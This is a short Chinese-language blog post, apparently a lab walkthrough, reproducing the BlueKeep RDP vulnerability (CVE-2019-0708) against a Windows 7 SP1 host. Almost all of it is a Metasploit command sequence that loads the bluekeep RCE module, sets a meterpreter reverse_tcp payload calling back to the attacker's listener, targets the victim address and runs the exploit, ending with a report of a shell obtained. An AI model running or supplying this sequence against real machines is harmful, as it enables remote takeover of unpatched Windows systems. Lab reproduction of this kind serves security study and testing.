CVE 2019-0708复现拿shell-泓源视野

CVE 2019-0708复现拿shell

把CVE-2019-0708的攻击套件添加到metasploit中
添加教程

攻击主机:192.168.10.128 目标主机:192.168.10.131 (win7 SP1)
打开msf,输入reload_all命令

msf5 > reload_all //加载脚本CVE 2019-0708复现拿shell插图
msf5 > search cve-2019-0708 //搜索cve-2019-0708

CVE 2019-0708复现拿shell插图1

#使用脚本
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
#设置监听反弹payload
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload windows/x64/meterpreter/reverse_tcp
#设置监听地址
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 192.168.10.128
#设置监听端口
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lport 4444

#设置目标ip
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rdp_client_ip 192.168.10.131
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.10.131
#取消默认设置的名称
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > unset RDP_CLIENT_NAME
#设置目标类型,提高成功率
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3
#查看攻击脚本要设置的参数
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

CVE 2019-0708复现拿shell插图2

#开启攻击
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
CVE 2019-0708复现拿shell插图3
成功获取到shell

CVE 2019-0708复现拿shell插图4

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。
11

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8235373 位访客, 您的IP是:[54.159.186.146]